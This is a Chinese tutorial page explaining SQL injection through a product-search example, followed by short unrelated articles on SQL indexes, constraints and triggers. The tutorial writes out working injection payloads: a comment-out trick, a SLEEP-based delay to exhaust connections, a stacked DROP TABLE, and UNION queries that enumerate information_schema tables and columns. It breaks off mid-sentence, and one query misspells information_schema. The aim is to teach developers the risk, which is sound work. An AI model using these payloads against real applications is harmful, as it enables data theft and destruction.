快速了解sql注入基本原理-SQL-PHP中文网

首页

数据库

SQL

快速了解sql注入基本原理

angryTom

Nov 29, 2019 pm 02:41 PM

sql注入原理

快速了解sql注入基本原理

SQL注入基本原理

WEB技术发展日新月异，但是徒手拼SQL的传统手艺还是受相当多的开发者亲睐。毕竟相比于再去学习一套复杂的ORM规则，手拼更说方便，直观。通常自己拼SQL的人，应该是有听说过SQL注入很危险，但是总是心想：我的SQL语句这么简单，不可能被注入的。

花5分钟看完这个完整的例子，从今往后应该再也不敢有以上侥幸心理了。

简单场景

有一个WEB界面提供输入商品名称，展示对应价格，生产日期及生产地信息。例如输入Hammer展示：

产品	价格	生产地	生产日期
Claw Hammer	12.98	American	2019.11.07
Club Hammer	29.98	Canada	2019.11.11

我们跳过了搭建Web搜索界面的过程，直接关注重点部分: SQL注入。

如果要实现以上功能，那么我们大致可以猜到服务器使用的SQL语句如下：

SELECT ? FROM ? WHERE ? LIKE &#39;%Hammer%&#39;;

其中?表示目前我们并不知道具体的表名和字段名，此SQL唯一可以被操纵的就是单引号里面的输入内容'%Hammer%。假如我们直接在查找框里输入一个单引号。即变成

select ? from ? where ? Like &#39;%&#39;%&#39;;

这样拼接后造成SQL语法错误，得不到任何结果，我们需要使用--来把最后一个单引号注释掉。

select ? from ? where ? Like &#39;%&#39;; -- %&#39;;

--后的是注释内容(你也可以用#），这样你可以得到所有的产品信息，目前为止，还是没有嗅到危险的信号。

产品	价格	生产地	生产日期
Claw Hammer	12.98	American	2019.11.07
Club Hammer	29.98	Canada	2019.11.11
Paring Knife	10.98	China	2019.11.11
Boning Knife	19.98	China	2019.01.01

小试牛刀and

紧紧抓住上一步中可以扩展的单引号部分。来一个简单的延时语句试一试:

select ? from ? where ? Like &#39;%Hammer%&#39; and 1 = SLEEP(2); -- %&#39;;

这时查询会2秒后才返回结果，如果把时间延长，用脚本多点几次查询，一下就能把数据库的连接池用完。

当然，还有破坏力更强的！

select ? from ? where ? Like &#39;%Hammer%&#39;; drop table xxxx; -- %&#39;;

可以直接把表/数据库直接删除掉，至于如何知道引数据库中有哪一些表(即如何确定上句SQL中的xxxx)呢？

为所欲为union

我们需要知道此数据库有哪一些表！这样才能能拿到有用的信息。

使用union可以把不同表的内容拼在一起，小试一下：

select ?,?,?,? from ? where ? Like &#39;%Hammer%&#39; UNION (select 1,2,3,4 from dual); -- %&#39;;

产品	价格	生产地	生产日期
Claw Hammer	12.98	American	2019.11.07
Club Hammer	29.98	Canada	2019.11.11
1	2	3	4

可以看到我们把假数据1，2，3，4成功地拼接到搜索结果中。

Mysql系统自带的信息都存在information_schema数据库中。我们试着在里面找找有用的信息。

select ? from ? where ? Like &#39;%Hammer%&#39; UNION (select TABLE_NAME,TABLE_SCHEMA,3,4 from information_schema.tables); -- %&#39;;

产品	价格	生产地	生产日期
Claw Hammer	12.98	American	2019.11.07
Club Hammer	29.98	Canada	2019.11.11
authors	hawkeye	3	4
products	hawkeye	3	4
user	hawkeye	3	4
....	....	3	4

现在知道了这些数据库名和表名，所有人都对它为所欲为了！(包括上面执行的DROP)。

看着列表一猜就能知道我们目前查的是products表，接下来我们再把products具体的字段也挖出来。

select ? from ? where ? Like &#39;%Hammer%&#39; UNION (select COLUMN_NAME,TABLE_SCHEMA,3,4 from imformation_schema.columns where table_name = &#39;products&#39;); -- %&#39;;

产品	价格	生产地	生产日期
Claw Hammer	12.98	American	2019.11.07
Club Hammer	29.98	Canada	2019.11.11
id	hawkeye	3	4
name	hawkeye	3	4
price	hawkeye	3	4
address	hawkeye	3	4
updated_at	hawkeye	3	4

所以，通过上面2步，我们知道了表名和字段名，那么查询API的完整SQL应该是(把上面的?都补全啦)：

select name,price,address,updated_at from products where name like &#39;%Hammer%&#39;;

通过不断重复以上几个步骤，你就可以通过这一个小小的入口把数据库的所有信息(比如上面发现的user表

以上是快速了解sql注入基本原理的详细内容。更多信息请关注PHP中文网其他相关文章！

声明

本文转载于：博客园。如有侵权，请联系admin@php.cn删除

SQL索引策略：通过数量级提高查询性能Apr 11, 2025 am 12:04 AM

SQL索引可以通过巧妙的设计显着提升查询性能。 1.选择合适的索引类型，如B-tree、哈希或全文索引。 2.使用复合索引优化多字段查询。 3.避免过度索引以减少数据维护开销。 4.定期维护索引，包括重建和移除不必要的索引。

sql怎么删除约束Apr 10, 2025 pm 12:21 PM

在 SQL 中删除约束，请执行以下步骤：识别要删除的约束名称；使用 ALTER TABLE 语句：ALTER TABLE 表名 DROP CONSTRAINT 约束名；确认删除。

sql触发器怎么设置Apr 10, 2025 pm 12:18 PM

SQL 触发器是一种在指定表上执行特定事件时自动执行特定操作的数据库对象。要设置 SQL 触发器，可以使用 CREATE TRIGGER 语句，其中包括触发器名称、表名称、事件类型和触发器代码。触发器代码使用 AS 关键字进行定义，并包含 SQL 或 PL/SQL 语句或块。通过指定触发器条件，可以使用 WHERE 子句限制触发器的执行范围。可以使用 INSERT INTO、UPDATE 或 DELETE 语句在触发器代码中执行触发器操作。NEW 和 OLD 关键字可以在触发器代码中用来引用受影

sql查询怎么加索引Apr 10, 2025 pm 12:15 PM

索引是一种通过排序数据列来加速数据查找的数据结构。为 SQL 查询添加索引的步骤如下：确定需要索引的列。选择合适的索引类型（B 树、哈希或位图）。使用 CREATE INDEX 命令创建索引。定期重建或重新组织索引以维护其效率。添加索引的好处包括提高查询性能、减少 I/O 操作、优化排序和筛选以及提高并发性。当查询经常使用特定列、返回大量数据需要排序或分组、涉及多个表或数据库表较大时，应该考虑添加索引。